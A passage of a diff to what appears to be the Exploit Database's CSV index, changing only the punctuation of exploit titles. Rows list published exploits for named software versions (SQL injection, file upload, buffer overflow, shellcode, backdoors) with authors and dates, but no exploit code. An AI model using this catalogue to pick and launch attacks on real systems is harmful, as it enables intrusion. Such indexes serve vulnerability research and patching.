SQL Injection",2013-09-03,ACC3SS,php,webapps,0 -38749,platforms/asp/webapps/38749.txt,"Flo CMS 'archivem' Parameter SQL Injection",2013-09-03,ACC3SS,asp,webapps,0 +38749,platforms/asp/webapps/38749.txt,"Flo CMS - 'archivem' Parameter SQL Injection",2013-09-03,ACC3SS,asp,webapps,0 38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0 38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0 38752,platforms/windows/local/38752.c,"Watchguard Server Center Local Privilege Escalation",2013-09-08,"Julien Ahrens",windows,local,0 38753,platforms/php/webapps/38753.html,"WordPress Event Easy Calendar Plugin Multiple Cross Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0 -38754,platforms/php/webapps/38754.txt,"eTransfer Lite 'file name' Parameter HTML Injection",2013-09-10,"Benjamin Kunz Mejri",php,webapps,0 -38755,platforms/php/webapps/38755.txt,"WordPress mukioplayer4wp Plugin 'cid' Parameter SQL Injection",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0 +38754,platforms/php/webapps/38754.txt,"eTransfer Lite - 'file name' Parameter HTML Injection",2013-09-10,"Benjamin Kunz Mejri",php,webapps,0 +38755,platforms/php/webapps/38755.txt,"WordPress mukioplayer4wp Plugin - 'cid' Parameter SQL Injection",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0 38756,platforms/php/webapps/38756.txt,"WordPress RokNewsPager Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-18,MustLive,php,webapps,0 38757,platforms/php/webapps/38757.txt,"WordPress RokStories Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-17,MustLive,php,webapps,0 38758,platforms/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0 @@ -35036,7 +35036,7 @@ id,file,description,date,author,platform,type,port 38766,platforms/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0 38767,platforms/php/webapps/38767.txt,"WordPress RokIntroScroller Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 38768,platforms/php/webapps/38768.txt,"WordPress RokMicroNews Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 -38769,platforms/php/webapps/38769.txt,"Monstra CMS 'login' Parameter SQL Injection",2013-09-20,linc0ln.dll,php,webapps,0 +38769,platforms/php/webapps/38769.txt,"Monstra CMS - 'login' Parameter SQL Injection",2013-09-20,linc0ln.dll,php,webapps,0 38770,platforms/php/webapps/38770.txt,"MentalJS Sandbox Security Bypass",2013-09-20,"Rafay Baloch",php,webapps,0 38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0 @@ -35045,7 +35045,7 @@ id,file,description,date,author,platform,type,port 38782,platforms/php/webapps/38782.php,"WordPress SEO Watcher Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0 38775,platforms/linux/local/38775.rb,"Chkrootkit - Local Privilege Escalation",2015-11-20,Metasploit,linux,local,0 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0 -38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0 +38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0 38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x and Security Gateway OS Denial Of Service",2013-09-23,anonymous,linux,dos,0 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0 38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 @@ -35073,13 +35073,13 @@ id,file,description,date,author,platform,type,port 38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote,0 38806,platforms/cgi/webapps/38806.txt,"Bugzilla 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps,0 38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 Tabular Reports Unspecified XSS",2013-10-09,"Mateusz Goik",cgi,webapps,0 -38808,platforms/php/webapps/38808.txt,"WordPress WP-Realty Plugin 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 +38808,platforms/php/webapps/38808.txt,"WordPress WP-Realty Plugin - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 38809,platforms/php/remote/38809.php,"PHP Point Of Sale 'ofc_upload_image.php' Remote Code Execution",2013-10-18,Gabby,php,remote,0 38810,platforms/hardware/remote/38810.py,"Multiple Vendors 'RuntimeDiagnosticPing()' Stack Buffer Overflow",2013-10-14,"Craig Heffner",hardware,remote,0 38811,platforms/php/webapps/38811.txt,"WordPress Daily Deal Theme Arbitrary Shell Upload",2013-10-23,DevilScreaM,php,webapps,0 38812,platforms/multiple/remote/38812.txt,"DELL Quest One Password Manager CAPTCHA Security Bypass",2011-10-21,"Johnny Bravo",multiple,remote,0 38813,platforms/multiple/remote/38813.txt,"Apache Shindig XML External Entity Information Disclosure",2013-10-21,"Kousuke Ebihara",multiple,remote,0 -38814,platforms/php/webapps/38814.php,"Joomla! Maian15 Component 'name' Parameter Arbitrary Shell Upload",2013-10-20,SultanHaikal,php,webapps,0 +38814,platforms/php/webapps/38814.php,"Joomla! Maian15 Component - 'name' Parameter Arbitrary Shell Upload",2013-10-20,SultanHaikal,php,webapps,0 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - Polymorphic execve Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0 38816,platforms/jsp/webapps/38816.html,"JReport 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps,0 38817,platforms/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0 @@ -35091,7 +35091,7 @@ id,file,description,date,author,platform,type,port 38831,platforms/php/webapps/38831.txt,"HumHub 0.11.2 / 0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80 38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence XML External Entity Information Disclosure",2013-10-11,IBM,multiple,remote,0 38826,platforms/linux/remote/38826.py,"Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote,0 -38827,platforms/php/remote/38827.txt,"Nagios XI 'tfPassword' Parameter SQL Injection",2013-12-13,"Denis Andzakovic",php,remote,0 +38827,platforms/php/remote/38827.txt,"Nagios XI - 'tfPassword' Parameter SQL Injection",2013-12-13,"Denis Andzakovic",php,remote,0 38828,platforms/php/webapps/38828.php,"Limonade framework 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",php,webapps,0 38829,platforms/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote SEH Buffer Overflow (DEP Bypass with ROP)",2015-11-30,Knaps,windows,remote,0 38830,platforms/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",php,webapps,80 @@ -35123,7 +35123,7 @@ id,file,description,date,author,platform,type,port 38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 voice-servlet processEvaluation()",2015-12-03,Metasploit,windows,remote,7777 38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",2015-12-03,Metasploit,windows,remote,7777 38861,platforms/php/webapps/38861.txt,"WordPress Gwolle Guestbook Plugin 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 -38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0 +38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0 38863,platforms/php/webapps/38863.php,"NeoBill /modules/nullregistrar/phpwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 38864,platforms/php/webapps/38864.php,"NeoBill /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0 38865,platforms/php/webapps/38865.txt,"NeoBill /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0 @@ -35131,17 +35131,17 @@ id,file,description,date,author,platform,type,port 38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0 38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 -38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 +38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin - 'jobid' Parameter SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0 38872,platforms/php/webapps/38872.php,"WordPress PhotoSmash Galleries Plugin 'bwbps-uploader.php' Arbitrary File Upload",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0 -38873,platforms/php/webapps/38873.txt,"eduTrac 'showmask' Parameter Directory Traversal",2013-12-11,"High-Tech Bridge",php,webapps,0 +38873,platforms/php/webapps/38873.txt,"eduTrac - 'showmask' Parameter Directory Traversal",2013-12-11,"High-Tech Bridge",php,webapps,0 38874,platforms/php/webapps/38874.txt,"BoastMachine - 'blog' Parameter SQL Injection",2013-12-13,"Omar Kurt",php,webapps,0 38875,platforms/php/webapps/38875.php,"osCMax - Arbitrary File Upload / Full Path Information Disclosure",2013-12-09,KedAns-Dz,php,webapps,0 38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 /auction/asp/list.asp pa Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0 38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator /auction/casp/admin.asp SQL Injection Admin Authentication Bypass",2013-12-16,R3d-D3V!L,php,webapps,0 38878,platforms/windows/dos/38878.txt,"WinAsm Studio 5.1.8.8 - Buffer Overflow Crash PoC",2015-12-06,Un_N0n,windows,dos,0 38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator Multiple SQL Injection",2013-12-14,R3d-D3V!L,asp,webapps,0 -38880,platforms/php/webapps/38880.txt,"Veno File Manager 'q' Parameter Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps,0 +38880,platforms/php/webapps/38880.txt,"Veno File Manager - 'q' Parameter Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps,0 38881,platforms/php/webapps/38881.html,"Piwigo admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0 38882,platforms/cgi/webapps/38882.txt,"Icinga cgi/config.c process_cgivars Function Off-by-one Read Remote DoS",2013-12-16,"DTAG Group Information Security",cgi,webapps,0 38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0 @@ -35167,7 +35167,7 @@ id,file,description,date,author,platform,type,port 38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin Velocity Template Injection",2015-12-08,Metasploit,multiple,remote,8080 38906,platforms/php/webapps/38906.txt,"dotCMS 3.2.4 - Multiple Vulnerabilities",2015-12-08,LiquidWorm,php,webapps,80 38907,platforms/php/webapps/38907.txt,"Osclass Multiple Input Validation Vulnerabilities",2013-12-14,R3d-D3V!L,php,webapps,0 -38908,platforms/php/webapps/38908.txt,"Leed 'id' Parameter SQL Injection",2013-12-18,"Alexandre Herzog",php,webapps,0 +38908,platforms/php/webapps/38908.txt,"Leed - 'id' Parameter SQL Injection",2013-12-18,"Alexandre Herzog",php,webapps,0 38909,platforms/linux/dos/38909.txt,"DenyHosts 'regex.py' Remote Denial of Service",2013-12-19,"Helmut Grohne",linux,dos,0 38910,platforms/windows/remote/38910.txt,"Hancom Office '.hml' File Processing Heap Buffer Overflow",2013-12-19,diroverflow,windows,remote,0 38911,platforms/windows/remote/38911.txt,"Microsoft Windows Media Center Library - Parsing RCE aka 'self-executing' MCL File",2015-12-09,"Eduardo Braun Prado",windows,remote,0 @@ -35195,7 +35195,7 @@ id,file,description,date,author,platform,type,port 38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0 38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for WordPress 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0 38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API Local Information Disclosure",2014-01-01,anonymous,linux,local,0 -38938,platforms/php/webapps/38938.txt,"xBoard 'post' Parameter Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0 +38938,platforms/php/webapps/38938.txt,"xBoard - 'post' Parameter Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0 38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 - '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 38940,platforms/multiple/dos/38940.c,"VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0 @@ -35219,7 +35219,7 @@ id,file,description,date,author,platform,type,port 38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator)",2015-12-13,B3mB4m,generator,shellcode,0 38965,platforms/php/webapps/38965.txt,"ECommerceMajor - (productdtl.php_ prodid param) SQL Injection",2015-12-14,"Rahul Pratap Singh",php,webapps,80 38966,platforms/php/webapps/38966.txt,"WordPress Admin Management Xtended Plugin 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80 -39096,platforms/php/webapps/39096.txt,"i-doit Pro 'objID' Parameter SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0 +39096,platforms/php/webapps/39096.txt,"i-doit Pro - 'objID' Parameter SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0 39097,platforms/linux/remote/39097.txt,"Red Hat Piranha Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 39098,platforms/php/webapps/39098.txt,"Joomla! Wire Immogest Component 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps,0 39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injection",2014-01-13,"Rohan Stelling",php,webapps,0 @@ -35284,7 +35284,7 @@ id,file,description,date,author,platform,type,port 39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 39026,platforms/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win_x86,dos,0 39027,platforms/win_x86/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free",2015-12-17,"Nils Sommer",win_x86,dos,0 -39028,platforms/php/webapps/39028.txt,"Joomla! Sexy Polling Extension 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 +39028,platforms/php/webapps/39028.txt,"Joomla! Sexy Polling Extension - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 39029,platforms/php/webapps/39029.txt,"bloofoxCMS /bloofox/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39030,platforms/php/webapps/39030.txt,"bloofoxCMS /bloofox/admin/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39031,platforms/php/webapps/39031.html,"bloofoxCMS /admin/index.php Admin User Creation CSRF",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35315,13 +35315,13 @@ id,file,description,date,author,platform,type,port 39056,platforms/windows/dos/39056.txt,"Adobe Flash MovieClip.localToGlobal - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39058,platforms/php/webapps/39058.txt,"Imageview 'upload.php' Arbitrary File Upload",2014-01-21,"TUNISIAN CYBER",php,webapps,0 39059,platforms/php/webapps/39059.txt,"WordPress Global Flash Gallery Plugin 'swfupload.php' Arbitrary File Upload",2014-01-18,"Ashiyane Digital Security Team",php,webapps,0 -39060,platforms/php/webapps/39060.txt,"XOS Shop 'goto' Parameter SQL Injection",2014-01-24,JoKeR_StEx,php,webapps,0 +39060,platforms/php/webapps/39060.txt,"XOS Shop - 'goto' Parameter SQL Injection",2014-01-24,JoKeR_StEx,php,webapps,0 39061,platforms/android/local/39061.txt,"GoToMeeting for Android Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0 39062,platforms/php/webapps/39062.txt,"ZenPhoto SQL Injection",2014-01-24,KedAns-Dz,php,webapps,0 39063,platforms/php/webapps/39063.txt,"WordPress WP e-Commerce Plugin Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 - Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 39065,platforms/php/webapps/39065.txt,"Eventum Insecure File Permissions",2014-01-27,"High-Tech Bridge",php,webapps,0 -39066,platforms/php/webapps/39066.txt,"Eventum 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0 +39066,platforms/php/webapps/39066.txt,"Eventum - 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0 39067,platforms/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,windows,dos,0 39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0 39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution Exploit",2015-12-21,bd0rk,php,webapps,80 @@ -35357,11 +35357,11 @@ id,file,description,date,author,platform,type,port 39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,asp,webapps,0 39107,platforms/php/webapps/39107.txt,"ATutor - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0 39108,platforms/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",php,webapps,0 -39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 +39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin - 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 39110,platforms/php/webapps/39110.txt,"Cory Jobs Search - 'cid' Parameter SQL Injection",2014-03-05,Slotleet,php,webapps,0 39111,platforms/php/webapps/39111.php,"WordPress Premium Gallery Manager Plugin Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps,0 39112,platforms/linux/local/39112.txt,"QNX Phgrafx File Enumeration Weakness",2014-03-10,cenobyte,linux,local,0 -39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store 'id' Parameter Multiple SQL Injection",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 +39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store - 'id' Parameter Multiple SQL Injection",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote,0 39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x 'ajax.autosave.php' Multiple SQL Injection",2014-03-19,"Claepo Wang",php,webapps,0 @@ -35371,12 +35371,12 @@ id,file,description,date,author,platform,type,port 39120,platforms/windows/local/39120.py,"KiTTY Portable 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39121,platforms/windows/local/39121.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 -39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0 +39124,platforms/php/webapps/39124.txt,"MeiuPic - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security Remote Denial of Service",2014-03-20,CXsecurity,windows,dos,0 39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 - /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0 39127,platforms/cgi/webapps/39127.txt,"innoEDIT 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0 -39128,platforms/php/webapps/39128.txt,"Jorjweb 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0 -39129,platforms/php/webapps/39129.txt,"qEngine 'run' Parameter Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0 +39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0 +39129,platforms/php/webapps/39129.txt,"qEngine - 'run' Parameter Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0 39130,platforms/cgi/webapps/39130.txt,"DotItYourself 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0 @@ -35459,7 +35459,7 @@ id,file,description,date,author,platform,type,port 39207,platforms/linux/local/39207.txt,"dpkg Source Package Index: pseudo-header Processing Multiple Local Directory Traversal",2014-05-25,"Raphael Geissert",linux,local,0 39208,platforms/windows/dos/39208.c,"Microsoft Windows Touch Injection API Local Denial of Service",2014-05-22,"Tavis Ormandy",windows,dos,0 39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router Cross Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0 -39210,platforms/php/webapps/39210.txt,"Seo Panel 'file' Parameter Directory Traversal",2014-05-15,"Eric Sesterhenn",php,webapps,0 +39210,platforms/php/webapps/39210.txt,"Seo Panel - 'file' Parameter Directory Traversal",2014-05-15,"Eric Sesterhenn",php,webapps,0 39211,platforms/php/webapps/39211.txt,"WordPress Infocus Theme '/infocus/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin Cross Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 39213,platforms/php/webapps/39213.txt,"WordPress Featured Comments Plugin Cross Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 @@ -35472,7 +35472,7 @@ id,file,description,date,author,platform,type,port 39220,platforms/windows/dos/39220.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts (1)",2016-01-11,"Google Security Research",windows,dos,0 39221,platforms/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win_x86-64,dos,0 39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0 -39223,platforms/php/webapps/39223.txt,"ZeusCart 'prodid' Parameter SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0 +39223,platforms/php/webapps/39223.txt,"ZeusCart - 'prodid' Parameter SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0 39224,platforms/hardware/remote/39224.py,"FortiGate OS Version 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0 39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Local Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0 @@ -35524,7 +35524,7 @@ id,file,description,date,author,platform,type,port 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0 39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 -39281,platforms/php/webapps/39281.txt,"VoipSwitch 'action' Parameter Local File Inclusion",2014-08-08,0x4148,php,webapps,0 +39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'action' Parameter Local File Inclusion",2014-08-08,0x4148,php,webapps,0 39282,platforms/php/webapps/39282.txt,"WordPress GB Gallery Slideshow Plugin 'wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps,0 39283,platforms/php/webapps/39283.txt,"WordPress FB Gorilla Plugin 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps,0 39284,platforms/windows/local/39284.txt,"Oracle HtmlConverter.exe - Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0 @@ -35536,7 +35536,7 @@ id,file,description,date,author,platform,type,port 39291,platforms/php/webapps/39291.txt,"WordPress KenBurner Slider Plugin 'admin-ajax.php' - Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 39292,platforms/multiple/remote/39292.pl,"Granding MA300 Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39293,platforms/multiple/remote/39293.pl,"Granding MA300 Weak Pin Encryption Brute-force Weakness",2014-08-26,"Eric Sesterhenn",multiple,remote,0 -39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 +39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 and Thunderbird 3.1.20 Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' - Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' - Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 @@ -35904,7 +35904,7 @@ id,file,description,date,author,platform,type,port 39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit",2016-04-13,"Zhou Yu",jsp,webapps,8088 39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0 39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - File Upload",2016-04-13,Metasploit,unix,remote,0 -39694,platforms/windows/dos/39694.txt,"Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,dos,0 